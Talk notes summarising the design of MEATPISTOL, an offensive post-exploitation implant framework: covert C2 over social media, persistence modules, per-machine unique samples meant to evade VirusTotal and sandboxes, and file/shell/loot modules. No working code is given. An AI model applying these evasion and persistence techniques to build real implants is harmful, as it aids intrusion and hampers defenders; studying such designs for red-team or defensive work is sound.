Skip to content


Talk on YouTube


  • MEATPISTOL is a framework for creating stealth implants that support persistent adversarial operations
  • Post exploitation tool, not for getting in

All the decent malware was only for Windows

  • Publicly available OSX malware didn't have encrypted comms or persistence or interactive shell
  • Wrote a Python-based reverse SSH tunnelling tool that used Twitter for C2 resolution, CronTab/LaunchDaemon for persistence, with random scheduling and an obfuscated generator script.
  • Wrote SSH client / servers in Java and Bash
  • Problem: have to configure new C2 infrastructure for each piece of malware

The ideal tool

  • Select features for malware implant
  • C2 infra set up automatically: each C2 endpoint is unique, keys taken care of
  • Each malware sample is unique. (That way, defenders can't find it in VirusTotal.)


  • Modular C2 methods like Reddit, Twitter, a server, etc
  • Can use multiple C2 methods, too
  • Multiple persistence modules
  • Generate malware is custom to machine, based upon some system info
  • That way, when you throw malware in sandbox it's not detected
  • Feed in PCAP and simulate it over the wire
  • Can exfiltrate traffic over multiple connections

How they built it

The core

  • Essentially a microkernel that runs module functionality
  • Is in golang, so it can run on Mac/Windows/Linux
  • Has a event loop
  • Has a scheduler loop

Types of modules

  • file: get files to/from remote PC
  • exec: get shell
  • c2
  • loot
  • hide: clean up artifacts of persistence
  • persistence

Channel API for modules

  • read()
  • write()
  • attach() - similar to file open
  • detach() - similar to file close
  • close() - after this, no more writes will happen

Learning lessons

  • Great CLI tools are human. MEATPISTOL displays a Taylor Swift quote on startup and displays MEATPISTOL ASCII art before exiting
  • Minimize the amount of typing the user has to do. Add default arguments everywhere it makes sense